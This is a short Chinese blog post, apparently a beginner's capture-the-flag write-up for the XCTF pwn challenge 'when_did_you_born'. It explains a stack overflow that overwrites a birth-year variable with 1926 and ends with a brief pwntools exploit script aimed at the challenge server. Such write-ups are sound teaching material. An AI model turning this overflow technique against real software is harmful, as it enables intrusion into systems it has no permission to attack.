xctf pwn when_did_you_born

菜逼的ctf之路

于 2020-09-29 21:37:50 发布

阅读量169

点赞数 1

本文链接：https://blog.youkuaiyun.com/weixin_45701079/article/details/108876295

版权

本文介绍了作者在XCTF比赛中遇到的一道栈溢出题目，通过分析ida代码，发现可以通过栈覆盖来改变变量值。作者提供了一个简单的python脚本来演示如何利用栈溢出来将出生年份改为1926。博客内容涉及逆向工程、安全漏洞利用和Python脚本编写。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

XCTF when_did_you_born

第一次写博客，写的不好，请多指教。
首先，看ida代码
在这里插入图片描述

(当时因为比较简单就没看汇编)
看代码，v4和v5之间只差8字节，利用栈覆盖，用8个数据填充v4，然后把第一次的v5覆盖掉(第一次v5可以是除了1926的任意数，第二次输出v4的时候利用栈覆盖，把原来的v5覆盖成1926)
最后贴出萌新的脚本

from pwn import *
io=remote("220.249.52.133",31846)
io.recvuntil("What's Your Birth?")
io.sendline("1")
payload="1"*8+p32(1926)
io.recvuntil("What's Your Name?")
io.sendline(payload)
io.interactive()

(这种题比较容易，有问题可以私聊)